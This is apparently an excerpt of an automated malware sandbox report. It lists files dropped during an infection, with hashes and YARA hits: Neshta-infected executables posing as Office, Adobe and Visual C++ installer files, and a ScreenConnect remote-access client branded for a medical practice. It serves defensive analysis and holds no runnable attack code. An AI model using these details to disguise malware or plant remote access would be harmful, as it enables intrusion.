                                                                        SHA-512:5F5A2C7F553B747A9A1811E9D4D3A0BDA525D5977D5BB709F65164308E020B31A7EC0029C435D8F05E46E737242BB5F934D0094728841F6C545E15C625444C47
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):4.744720269791172
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJozp/q4:JxqjQ+P04wsmJCV/Z
                                                                        MD5:316C81CA54C5FAC241D16CA25E7B341C
                                                                        SHA1:9E1199BCB359EA9146EAD52E765F3913A791CD7A
                                                                        SHA-256:9CE3D752106B78CBB5CF3DF574CD084177C4CF97FF35CC6E983EAD6F4A3F6CE1
                                                                        SHA-512:CEC15054D8351322566F67B46B333F11064CB650D4ADDCDBC9174C66EE4E4D4F1C3400FDE6BBDCD3B632ED051C92E898C5170B1A6504BB11A771230D4EA15D3F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.422024969420582
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjMnNFZnBeGI9cKm8q3+i2PPvfKLD1D9nwt:sr85CMBeLsOBXiN9nwt
                                                                        MD5:62F99051442ED97159B8D9CC03BBF8DC
                                                                        SHA1:E22CF810217DFC5700C2C629162EF37CA672C957
                                                                        SHA-256:C83C04BB7EBAC75F623938C167AD7F09606F2E0B786A1CCAFA12E080F9455E9A
                                                                        SHA-512:FE259BC5D8C12884C403B4F08E00272DEBFEECEDF5F9230F8B0A3B6DE100D58AEC610B849DFFD94568A44389FACAF7B55B1631F9AA51BD91B7C1F3C91408619A
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\Client.Override.en-US.resources
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):332
                                                                        Entropy (8bit):4.8237545463154605
                                                                        Encrypted:false
                                                                        SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oH+DdPIGKfU4G6cA0Br8VNar1:rHy2DLI4MWoHw1ItfU49cA6Em1
                                                                        MD5:A935A8EF2D279A909135D0719BD52255
                                                                        SHA1:14761786644BFDBD62D9CA59CF24EBEF72794DF3
                                                                        SHA-256:234C8AB455FCC7DEFC945C4FED455B559D45F2C9FB1A90F976DE544186757397
                                                                        SHA-512:E41CD9543C3BDD06FA51124934410325CA1DC8FB545CDA8AFF1A30FB8FC5278BD11F6F20D44D9251011DFD3D8C455B2629B26A1F67C7B6AC686D8089E7305C92
                                                                        Malicious:false
                                                                        Preview: ...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_Q2T}5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.......Nephrology Associates..Nephrology Associates
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\Client.Override.resources
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):180
                                                                        Entropy (8bit):4.9556690067327445
                                                                        Encrypted:false
                                                                        SSDEEP:3:n87j23zjkQXGKZMHLsbNRLFS9Am12MFuAvOAsyQHxW+i3zjvGztlmut/l:8kVXdyrKDLIP12MUAvvR+oR6/l
                                                                        MD5:CD7DBC7ABEDA9893CE25793744443958
                                                                        SHA1:DBBBBE2694D4B9B990881F279B4313574DBEAC9B
                                                                        SHA-256:E13ED2C59366D0EEA74863FD71A81F0CB977CCE1EDFDE304FC538690A4F6AC89
                                                                        SHA-512:E880F131FF460384940248AB2ECD97189AE0B7169FE5246440DFBCE32F295CBD7697CE2EE65B434A0E40BE91B91C21B2C14B1F446B2B1650D0A5D94C0D4F37EF
                                                                        Malicious:false
                                                                        Preview: ...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\Client.en-US.resources
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):35325
                                                                        Entropy (8bit):4.731693526918675
                                                                        Encrypted:false
                                                                        SSDEEP:768:/ABBqfjszQ0wzLBG3jMl7X2njOFr92wzLMhjKV1zwj8XE9Wwo:/ABBqeQDLBG3IlD2njOFr92wzLMhjKV9
                                                                        MD5:2A2B496732CEA1744929BD8C97B411FB
                                                                        SHA1:4BCD377500FCF023A681B7ED769B082713BED0AE
                                                                        SHA-256:381F7F8B62159D6A76FC19BC2A7397E83776127D54E3956B8DD143CF7149AAFA
                                                                        SHA-512:4F34BAFC302A99D82238787938A7B99FFCAD9C048E6AB63BBB168B197733A4252AB05E08A63869152EECF546F7D5777E744F2AD0A2D13D438B63250CB9DCE2A8
                                                                        Malicious:false
                                                                        Preview: ...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....X.......PADPADP.'...wp.......y....)>..Ldt..... $...1$./>>...L.y.0.C._.........Qj.o....<....=...R...&.......1p2.r.x.u?Y..R..I.5.2q..R...>.E.@ ).w.l.....S...'.C.I.........4.........J..P<.E..=c!.@To..#.._.2.......k..h..........^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.X...Q........4_.Sns.........=..]t...X....8.e`}..n..H[..S@?.~....,...j.2..*v.......B....A...a...D.w..K,..t...*v..&.....r........Y...i..'.............'.......Z.....#2e..........|....)..%....A.....u;N.......}.tD....4.J...L......5..M....K..3U..M.................>.......?...A......3.m....=.H......n..,4.~...<h..u...i.H.........V/...P.z....V".....(N.......mC...8.....x2..'....N...^..Js$.cr..a...*[#...M..WT.3....+0..D..RT|.......*...I.....3.....%..P...]..`...u...n:..............b.1............O..oF.......|..z.* &.[ OJ;!I.V!
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\Client.resources
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):2238
                                                                        Entropy (8bit):5.525574002540019
                                                                        Encrypted:false
                                                                        SSDEEP:24:zHE4j13yrM0fn10H0ufKPOxp3KC/JBJmFmcEJJoFJCBJJuecEJJzI+E5IOZZpOIc:rHxAaDT3KC/yESDxE0+72ofJKawTSd
                                                                        MD5:0B47901F2C782922F034FBA8E8062916
                                                                        SHA1:893075F8CA04F92DBEF7F6E81223E1B08E29328F
                                                                        SHA-256:64DA2CFEACFCBA97CAD701DA9288618BC42A20F69DD4A0FE5652CE49EF92524C
                                                                        SHA-512:B3DB1C4FFED1DBAEF5E03F4819BCBA5F0A6864C26123E059B6A649911ADBD380AE3AA1EB63C2397EA1EA5FC61103468B5DB838080D7C7D5DE848B5002C31CBD6
                                                                        Malicious:false
                                                                        Preview: ...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^....E.....(....jF.C....../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p....a...-...........8...'...h...........O...........w.......P..............."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.8...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.....*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r.....*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r.....<D.a.r.k.T.h.e.m.e.D.e.f.a.u.l.t.H.i.g.h.l.i.g.h.t.C.o.l.o.r.....,D.a.r.k.T.h.e.m.e.M.a.i.n.B.a.s.e.C.o.l.o.r.....$D.a.r.k.T.h.e.m.e.T.e.x.t.C.o.l.o.r.....,L.i.g.h.t.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r.....>L.i.g.h.t.T.h.e.m
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Client.dll
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):147456
                                                                        Entropy (8bit):6.95042317553366
                                                                        Encrypted:false
                                                                        SSDEEP:3072:tIhbeLI0tsjKnVloc2KYL5+RJK4h0E9twjJ6fu:ubeLXtppM8KEfwg
                                                                        MD5:F1EA5E1DD79B36A6CF64EC132DCEE436
                                                                        SHA1:784F9DB1C166A2DE65A49C99A17F022F9A685AA9
                                                                        SHA-256:EC01ED64E7BBC30A53C66D432E634F5EB12ECE99AB3FC1A45440400A4FF25323
                                                                        SHA-512:22ACE1ED0A501CFC7707F50FBEE7D1AF356D232459028301CEB4F9C1F142A92CA4EF0EBCA833F917B0154B15A88D62FDE7A8AC46E4460C287C2348A7A774B221
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z].........." ..0..8...........W... ...`....... ...............................d....@.................................lW..O....`............................................................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............>..............@..B.................W......H........z..............|n..p....V........................................{....*:.(......}....*z.(....s....%..(...+o....o....*...0..[....... ......... ...........x...%.r...p.%.r...p........y...%.....(.....4..............s ....;...*..0...........~....%-.&~..........s!...%.....(...+..~....%-.&~..........s#...%.....(...+.r9..p..(....-.rW..p+.ro..p($....(1.....,...(%...*.*..0..Y........-..*........i.ZX.}.........+...%.X. ........X.....2....+.......i(&......iX....X.....2..*j.s'...
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.dll
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):30208
                                                                        Entropy (8bit):5.820363385380722
                                                                        Encrypted:false
                                                                        SSDEEP:768:1smKdE7MSlTOzxD1u2Af2Oq1cq7Clxnx1IbA5rb/:i4vOvP+q1v7ClWbkrb/
                                                                        MD5:95F6BCC76C1069CC377635EC46C4183D
                                                                        SHA1:724A325DD9D39F3CC429DC99065B2BB2DD5B0E68
                                                                        SHA-256:1913808A0E185B794C42DC8CFB0347884D84AD8459D591BB203F17740C12EF56
                                                                        SHA-512:4A3003512983392E628932CBC738735E511FE5805C6ED7E75B2451E13618411617EF55CCB9022BE75D8FED5C95EC74AB75DE4B893A7AA8B075094E3FC7FB9527
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-.Z].........." ..0..n..........n.... ........... ....................................@.....................................O.................................................................................... ............... ..H............text...tm... ...n.................. ..`.rsrc................p..............@..@.reloc...............t..............@..B................P.......H........@...K..........................................................J(......(....(....*..0..9.......(....r...p(....(........(......i.2....(....+..s....(....*....0..d.........(......}.....s....}.....s....}.....s....}.....{...........s....o...... 0u.........s....s....}....*..(.....{......o....~....%-.&~......-...s....%.....(....&*...0..O........(.....{......o.....{......(.....~....%-.&~..........s....%.....(.......(.....*....... .'G.......0...........{......(......(.......(
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):90504
                                                                        Entropy (8bit):6.454336660844859
                                                                        Encrypted:false
                                                                        SSDEEP:1536:CVnKQbrt7pdnNmhno7GcqbksWjcdLyXN4WA6tMw8NktY:C8wt7TvmbLLyXOWA6tMSC
                                                                        MD5:79EC78769BF8092719B0E72B174BAB54
                                                                        SHA1:4C480310A72DD3B7B4C56F3D1347757D0B989CAE
                                                                        SHA-256:A7C54EE431B6733FDC3F26D7E439C748843B9D88DA35805D4BEE9A0B07F64DEE
                                                                        SHA-512:84FDA5C4E63C4C8FF5E1B9F43FF76DB1E341A8552B7F87B150C48894D7E28ABB539090C7E48B43507487FBF669E55ABC7B191D50573FD3AF80E2B79890C40223
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:I..~(a.~(a.~(a.sz..Y(a.sz..o(a.sz...(a.8y..|(a.wP..t(a.`z..}(a.~(`..(a..Q...(a.sz...(a..Q...(a.Rich~(a.........................PE..L...F.*[..........................................@......................................@................................../..x.......`............H..........H.......8............................'..@...............t............................text............................... ..`.rdata...W.......X..................@..@.data...@0...@....... ..............@....rsrc...`............2..............@..@.reloc..H............8..............@..B........................................................................................................................................................................................................................................................................................................
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Core.dll
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):371200
                                                                        Entropy (8bit):5.9748911687895365
                                                                        Encrypted:false
                                                                        SSDEEP:6144:wplDccjhts4N+/Xon+LAM+tIVnF6nWpnPq8uiph/jISvVx4k4DEV7PX4:wp57joy7yAHtKnJlpx7f
                                                                        MD5:CA0F11FB4EC67C9B1EAF6B2D790830DA
                                                                        SHA1:4BDABF67897A2EF58E97AD4F96C5CA96AB846E28
                                                                        SHA-256:418E1EDEE0E84AFB4FF1A75AA1AEF204CEAAA4A54F67AB9829718775A6C9BE8A
                                                                        SHA-512:975B9704F5532A6ACA2BE23B8507AF3879CCE0441B0850784D6B4D8888DE86A0AFF1018A53D1A50AC5BBB210F1D47775525F1628950E2B8BDF8076C07A3D373B
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z].........." ..0.................. ........... ....................... ......".....@.................................h...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......T.............................................................."..s0...*&...s1...**....s2...*2......s3...*:........s4...*B..........s5...*>..}6.....}7...*&...(8...*2...(8......*2...(9......*2...(9......*>...(9.........*>...(9.........*N.{6....{7....s:...*R.{6....{7.....s;...*V.{6....{7......s<...*^.{6....{7........s=...*f.{6....{7..........s>...*z.{6....{7....{?....{@...s;...*..{6....{7....{A....{B....{C...s<...*..{6....{7....{D....{E....{F....{G...s=...*..{6....{7..
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Windows.dll
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):1774592
                                                                        Entropy (8bit):6.658227212263865
                                                                        Encrypted:false
                                                                        SSDEEP:24576:peK+RfmT01krTL3ZALqdrimVsJq2l6TOKoMjSvShvU8OiH4SqfKPTsUTHEWEZfMi:pegT0+TL3Z0Mi963PSuIiH7efP
                                                                        MD5:D7C33234363E582439BA9BDE89585D8D
                                                                        SHA1:2F0F224B9CBAAB77160A80B41D8E136FAAD49EF0
                                                                        SHA-256:B9E298C36F055E74700FF1E0DA5E922541E976A918F6F6E1DECB745FD81347D6
                                                                        SHA-512:BD75E0898CE65BE19CA00C6AEF69B692F0389033F4B97204A7B96E09ADAA3408B26B0B103928B6DFFF65DC6A5FEEF1CD60C7AB12CB6AF4477C49AA437AC0800A
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z].........." ..0.............j*... ...@....... ..............................D;....@..................................*..O....@.......................`....................................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................L*......H.......(...0|..........X...@....)........................................s&...*..s'...*:.((.....()...*..{*...*"..}*...*J.(+........(,...&*:.((.....(-...*..{....*"..}....*..0..(........(/......+.............(,...&..X....i2.*v.((....s0...}.....s1...}....*f.{......(...+.....o3....*.0...........o4....+..o5......(...+&.o....-....,..o......*..........."........{..........o6...&.......(.....*....0..J..........{............o7...-,..o8...........(...+&.{...........(...+o:....(...+*v.
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):529288
                                                                        Entropy (8bit):6.132516961515779
                                                                        Encrypted:false
                                                                        SSDEEP:6144:S/qbea7sQeGx1sGkRHHMJxzT2sWS1H4lXwntstgP4KMdmE7xuSrYcB2a4IDAlfuY:SC/sixylBHe1yXIJPdmUSeZQcjn
                                                                        MD5:5597916ED66980D09C38DD206054CD6F
                                                                        SHA1:9F42D0BA7B747133000C73465B6FA6D019C0A9DE
                                                                        SHA-256:CD8F31D24C26920C6BB562E2778922752C1B3693FFFCFEB33F2AB516819838AB
                                                                        SHA-512:19CA41E484E8AF1A5AEAC68D068C00788B840F4ACF0A3BB34FEE2C1CC577EE0C4D599BC170A4E255D4C7A878E334D3BE289CE3A31E18F8BE03257407F8616FE3
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.Z].........."...0.................. ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......x.................................................................{C...*..{D...*V.(E.....}C.....}D...*...0..;........u+.....,/(F....{C....{C...oG...,.(H....{D....{D...oI...*.*. )'+. )UU.Z(F....{C...oJ...X )UU.Z(H....{D...oK...X*.0...........r...p......%..{C....................-.q.............-.&.+.......oL....%..{D........../...../...-.q/......../...-.&.+.../...oL....(M...*..{N...*..{O...*V.(E.....}N.....}O...*...0..;........u0.....,/(F....{N....{N...oG...,.(H....{O..
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe.config
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):259
                                                                        Entropy (8bit):4.947405559236275
                                                                        Encrypted:false
                                                                        SSDEEP:6:JiMVBdTMkI7VKk7Vri7VNQuWuAKPKXk2ygAyON0pW4QIT:MMHd417VOE9XXoE0B4xT
                                                                        MD5:95F04AA18DC27E4F0C73AC6829DCC3D8
                                                                        SHA1:2F361486C18E23CEA4B375E1C9CCCDC14BDD620D
                                                                        SHA-256:F3C7ED5A1114CBFA6E3E996F4B0311EDB5E25DC2099FD7EB7A3A456C261A2D94
                                                                        SHA-512:59BFD8675C2B215E793BF343B6D1AA9C3304AB763C5870A4934AB947284AF7BB0493FC4B5A6048DC3D531262E061D68D7395F09EAEE1EBF1524C0D8ED63164B4
                                                                        Malicious:false
                                                                        Preview: .<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false"/>.. </runtime>..</configuration>
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\app.config
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):559
                                                                        Entropy (8bit):4.6563079743992954
                                                                        Encrypted:false
                                                                        SSDEEP:12:MMHdGPa9yos26K9YG0a9yVXpxs26K9YG1lokVXpxOOmo/ENmjvPvTVXpx3xT:Jdz9iKN9qXp8K3XpRmo/dHvxXp/
                                                                        MD5:3A17CBE4E7BA4431A6083EC2F6D5125A
                                                                        SHA1:8C676267EB22369E7C12427BC0003D6B4C9E9C00
                                                                        SHA-256:A56BA549DD171D04E9C7FFFF0F74A55E99D2B8E96FB7C27E354788E293FFF123
                                                                        SHA-512:8BBC715DD894A8CBA776F27EABE95B4E9CC5DEDAB85755CE7331FF3C1460425E2B6241B5D95EDF204C2900133D502ED21391A7215485A5BD91F95F2969D92A5A
                                                                        Malicious:false
                                                                        Preview: .<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.SystemSettings" type="System.Configuration.ClientSettingsSection" />.. <section name="ScreenConnect.UserInterfaceSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.SystemSettings />.. <ScreenConnect.UserInterfaceSettings>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. </ScreenConnect.UserInterfaceSettings>..</configuration>
                                                                        C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.441581793400409
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbqnf2+Q4NIvym8kig4kZ5vHDRKjwX03:JxqjQ+P04wsmJCEq+l428qjRNX4
                                                                        MD5:E9116F5812E84117738237DE522B5445
                                                                        SHA1:367077F61C829CCA2196A1FB3DD837DCB0933BE2
                                                                        SHA-256:70ED68891E1B8B9EBEBDFAC5E78E5A2C96A494A309E6E86EDFBE1507C1AAFECD
                                                                        SHA-512:B34DA2164DFE64B604B60430A32C6DE6EA99B13D4EF9B972D017977DCCCBE46327FB4BDD9F6FE580816AB277D142780057B5C632A2FDB556AC231E461DC340AB
                                                                        Malicious:true
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.485543952012
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC19QHwtRF9YkjqOOdwtFR+9zAKEC2OoxAwMqc4:sr85C1IyRF9YkjqOOOB8zAK2OoxAwMqx
                                                                        MD5:5BFD09277E78C899F354E5E1144B162A
                                                                        SHA1:41A9E6398CCD75ABF1B0E482A196EA27E6E3E9F1
                                                                        SHA-256:043710D790F7C99AA46C0C6347CC38046AA1B097519DB5F6A257B8E9B5FF578E
                                                                        SHA-512:2EC324783041FF402543E60FF1A8C3A8673AC68CF4FA1AF86D20248FF3874AEAA37DF83380612E49DE8D4FD94D58D4E0CF1888E3ED1B9369C12C60735506A20D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Joe Security
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.562712500136307
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCzzw4jkfLZTxJtDSoieff:sr85CzEBfLzJtR
                                                                        MD5:4C436BAC03F954F21B3D6192A898EDE3
                                                                        SHA1:1817116645BC8D2C0FB3653694D9DEDB990D4D0A
                                                                        SHA-256:2DFB8EEC68A9B0730567D2E18C9F4FDD2343238C6A2F4CA41750B229D3E3AD38
                                                                        SHA-512:807A1F1D78DA195DF1D714E32C53C610FE3C0E2059BAE0C90C2A2491B48E93CA8D04BB8640CC034EF000F4846016CE4DE5EF7295FDBF72668C30645334F049D6
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Joe Security
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Florian Roth
